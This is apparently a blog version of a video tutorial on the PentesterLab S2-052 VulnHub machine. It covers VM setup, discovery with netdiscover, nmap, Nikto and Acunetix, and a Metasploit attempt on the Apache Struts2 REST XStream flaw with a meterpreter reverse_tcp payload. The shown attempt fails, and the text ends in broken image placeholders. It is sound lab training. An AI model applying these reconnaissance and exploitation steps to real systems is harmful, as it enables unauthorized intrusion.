Hello, everyone! Thank you for tuning in to our latest
video. Today, we're diving into a tutorial series focusing on vulnerable
machines called "PenetesterLab". Our target for this session is a
machine labeled "s2-052".
To get started, you'll need to grab the vulnerable image
from VulnHub's website. If you're new to VulnHub, don't worry; you can check
out our previous videos in the VulnHub playlist for a primer.
Pentester Lab S2.052 is a vulnerable virtual machine hosted on Vulnhub. It provides an environment for practicing penetration testing skills and learning about various security vulnerabilities.
Once you have the image, setting up the virtual machine (VM)
in VirtualBox is our next step.
Settings Up
In this section, we're going to guide you through setting up
a new virtual machine (VM) in VirtualBox. Since the file we've downloaded comes
in the ".iso" format, the first step is creating a new VM.
Begin by launching VirtualBox.
Then, click on "New" to initiate the creation of a
new virtual machine (VM).
Here, we'll need to specify the Virtual Machine Name,
Operating System type, and version. Since we obtained the information from the
VulnHub page, we know that the vulnerable iso is Linux-based.
Click next, to customize the hardware settings by adjusting
the RAM and Virtual CPU count.
Click Next, and you'll be prompted to create a new virtual hard
disk. This step allows you to allocate storage space according to your
requirements.
After configuring the disk, click "Next", to confirm
the changes that we did earlier.
Finally, click "Finish" to complete the creation
of your VM. Once the VM is created, you'll see it listed in the
VirtualBox Manager.
Now, Let's organize it by grouping it under
"PenetesterLab".
Now, let's configure the settings.
Select the VM,
click on "Settings", and navigate to the storage settings.
Here, add
the iso image.
Now, change the network adapter to "Host-only adapter"
in network settings.
It's important to ensure that both your Kali Linux machine,
which I use it for performing attacks, and the vulnerable machine are connected
to the same network.
With everything set up, it's time to start the Virtual
Machines.
You'll notice that the Vulnerable Machine is ready, displaying a
shell prompt for input. However, our goal is to access it from the Kali
machine.
Let's dive into the fun!
Enumeration
Enumeration is the first process of our attack, aimed at
identifying the IP Address of our Target Machine using NetDiscover.
To do
this, open a terminal, run "netdiscover -i" and then
specify the network interface name, which is eth1.
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.103.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
From the scan result, we have obtained our target IP address,
which is, "192.168.95.4".
Next, we move on to conducting a network scan to identify
open ports. This step is crucial in understanding the attack surface and
planning targeted attacks. We'll utilize the widely-used Nmap tool for this
task. Execute "nmap -A" followed by the IP address.
Where, the
"-A" flag enables a comprehensive scan across all available
ports, providing insights into the versions running on each port.
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.95.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 23:22 IST
Nmap scan report for 192.168.95.4
Host is up (0.0015s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-title: Orders
|_Requested resource was /orders.xhtml
|_http-server-header: Apache-Coyote/1.1
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
┌──(kali㉿kali)-[~]
└─$
After conducting the network scan, we spotted the
presence of one open port.
Specifically, The Port 80/TCP, is basically running an
HTTP service. This suggests the presence of a vulnerable web application.
So let’s take a look at the web content running on port 80. To
look at the contents ourselves, we can open a web browser of our choice, and
navigate to the target's IP address in the URL bar at the top of the
window.
Upon examining the webpage, there appears to be a potential
vulnerability. Let's utilize the Nikto command line tool to identify it.
+ /orders.xhtml/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /orders.xhtml/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /orders.xhtml: Cookie JSESSIONID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ : Server banner changed from 'Apache-Coyote/1.1' to 'Apache/2.2.21 (Unix) DAV/2'.
This article delves into Nikto, a widely used web application security scanner. Nikto is designed to identify various vulnerabilities and misconfigurations in web servers and web applications, making it an essential tool for security professionals.
After analyzing the results, we've uncovered a MIME content
type vulnerability.
However, this finding alone doesn't provide much insight.
To conduct a more thorough scan and uncover additional vulnerabilities, I'll
employ the use of "Acunetix".
To launch the Acunetix dashboard, simply run the command
"service acunetix start" in your terminal.
┌──(kali㉿kali)-[~]
└─$ service acunetix start
This will initiate the
Acunetix server on Port 3443 on localhost.
If Acunetix isn't available,
alternatives like OpenVAS or Nessus can be utilized.
This in-depth guide covers the process of mastering OpenVAS for scanning vulnerable environments. OpenVAS is a powerful open-source vulnerability scanner used for identifying security issues in networks and systems.
For those interested in installing Acunetix on Kali for
free, check out the blog link provided below this video.
This tutorial provides a detailed guide on how to install Acunetix on Kali Linux using Docker. Acunetix is a powerful web vulnerability scanner, and Docker provides a convenient way to set up and manage software environments.
Once on the Acunetix dashboard page, navigate to
"Targets" and select "Add target" to begin scanning.
Input
the URL of the potential vulnerability and save the target.
No further adjustments are necessary; simply click
"Scan" to initiate the process.
From here, you can customize the
scanning options to your preference. For instance, I've chosen a full scan type.
After configuring the options, simply click "Create scan" to initiate
the scanning process.
The scanning process has begun, and you can monitor its
progress in the Activity section through the progress bar.
However, as the scanning is consuming considerable time,
I'll halt it momentarily. I believe I've already identified the vulnerability.
It appears to be the Apache Struts2 Remote Code Execution
(s2-052) vulnerability.
Here, you will find out the detailed information
regarding this vulnerability, offering further insights. Take a look if you
wish to delve deeper.
Now that we've identified the vulnerability, it's time to
move on to the exploitation step.
Exploitation
To exploit this vulnerability, we'll utilize the MSF
console, which can be easily accessed from the Kali menu.
Once opened, you'll find yourself in the MSF6 console.
$ sudo msfdb init && msfconsole
[sudo] password for kali:
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Metasploit tip: Enable verbose logging with set VERBOSE true
Interact with a module by name or index. For example info 6, use 6 or use exploit/multi/http/struts2_rest_xstream
After interacting with a module you can manually set a TARGET with set TARGET 'Windows (Dropper)'
msf6 >
The search results display 6 modules, tailored to different
operating systems. We already know the OS is Linux, but to confirm it, we can
use n map. Here Linux is confirmed.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -O 192.168.95.4
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 23:36 IST
Nmap scan report for 192.168.95.4
Host is up (0.00046s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:BA:A8:5E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.10 seconds
┌──(kali㉿kali)-[~]
└─$
To proceed, execute "use 5" to select the Linux
module, where the payload will be automatically selected.
msf6 > use 5
[*] Additionally setting TARGET => Linux (Dropper)
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_rest_xstream) >
Next, utilize the "options" command to display the
required parameters for the attack.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/struts2_rest_xstream) >
Upon running the “exploit”, we encountered an error message:
"Exploit completed but no session was created."
Now, let's carefully analyze the options to ensure
everything is configured correctly. Upon verification, all settings appear to
be in order. It appears to be like, the issue may lie with the payload
selected.
Let's address this by selecting a different payload.
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
